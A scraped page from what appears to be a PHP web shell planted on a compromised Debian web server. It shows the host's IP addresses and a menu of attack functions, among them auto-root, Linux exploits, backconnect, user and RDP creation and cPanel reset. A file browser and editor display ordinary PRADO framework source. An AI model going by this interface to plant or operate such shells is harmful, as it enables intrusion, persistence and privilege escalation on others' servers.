Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.141.25.100
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
v2021 /
framework /
Web /
UI /
[ HOME SHELL ]
Name
Size
Permission
Action
ActiveControls
[ DIR ]
drwxr-xr-x
WebControls
[ DIR ]
drwxr-xr-x
TCachePageStatePersister.php
5.9
KB
-rw-r--r--
TClientScriptManager.php
23.2
KB
-rw-r--r--
TCompositeControl.php
966
B
-rw-r--r--
TControl.php
66.37
KB
-rw-r--r--
TControlAdapter.php
3.48
KB
-rw-r--r--
TForm.php
4.3
KB
-rw-r--r--
THtmlWriter.php
5.1
KB
-rw-r--r--
TPage.php
36.97
KB
-rw-r--r--
TPageStatePersister.php
1.63
KB
-rw-r--r--
TSessionPageStatePersister.php
3.76
KB
-rw-r--r--
TTemplateControl.php
6.54
KB
-rw-r--r--
TTemplateControlInheritable.ph...
3.56
KB
-rw-r--r--
TTemplateManager.php
34.7
KB
-rw-r--r--
TThemeManager.php
13.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TTemplateControlInheritable.php
<?php /** * TTemplateControlInheritable class file. * * @author Schlaue-Kids.net <info@schlaue-kids.net> * @link http://www.schlaue-kids.net/ * @copyright Copyright © 2010 Schlaue-Kids.net * @license http://www.pradosoft.com/license/ * @version $Id$ * @package System.Web.UI */ Prado::using('System.Web.UI.TTemplateControl'); /** * TTemplateControlInheritable class. * TTemplateControlInheritable is an extension to the base class for all controls that use templates. * By default, a control template is assumed to be in a file under the same * directory with the control class file. They have the same file name and * different extension name. For template file, the extension name is ".tpl". * If a TTemplateControlInheritable is inherited it uses the base class template unless the * inheriting control defines an own. * * @author Schlaue-Kids.net <info@schlaue-kids.net> * @author Kyle Caine <http://www.pradosoft.com/forum/index.php?action=profile;u=1752> * @version $Id$ * @package System.Web.UI * @since 3.1.8 */ class TTemplateControlInheritable extends TTemplateControl { // methods /** * Creates child controls. * This method is overridden to load and instantiate control template. * This method should only be used by framework and control developers. * Uses the controls template if available or the base class template otherwise. * * @return void * @throws TConfigurationException if a template control directive is invalid */ public function createChildControls() { if(null === ($_template = $this->getTemplate())) { return $this->doCreateChildControlsFor(get_class($this)); } foreach($_template->getDirective() as $_name => $_value) { if(!is_string($_value)) { throw new TConfigurationException('templatecontrol_directive_invalid', get_class($this), $name); } $this->setSubProperty($_name, $_value); } $_template->instantiateIn($this); } /** * This method creates the cild controls for the given class * * @param string $parentClass The class to generate the child controls for * @return void */ public function doCreateChildControlsFor($parentClass) { if(false !== ($_parentClass = get_parent_class($parentClass)) && 'TTemplateControl' != $_parentClass) { $this->doCreateChildControlsFor($_parentClass); } $this->doTemplateForClass($parentClass); } /** * This method creates the template object for the given class * * @param string $p_class The class to create the template from * @return void * @throws TConfigurationException if a template control directive is invalid */ public function doTemplateForClass($parentClass) { if(null !== ($_template = $this->getService()->getTemplateManager()->getTemplateByClassName($parentClass))) { foreach($_template->getDirective() as $_name => $_value) { if(!is_string($_value)) { throw new TConfigurationException('templatecontrol_directive_invalid', get_class(this), $_name); } $this->setSubProperty($_name, $_value); } $_template->instantiateIn($this); } } // getter/setter /** * A source template control loads its template from external storage, * such as file, db, rather than from within another template. * * @return boolean whether the current control is a source template control */ public function getIsSourceTemplateControl() { if(null !== ($_template = $this->getTemplate())) { return $_template->getIsSourceTemplate(); } return ($_template = $this->getService()->getTemplateManager()->getTemplateByClassName(get_parent_class($this))) ? $_template->getIsSourceTemplate() : false; } }
Close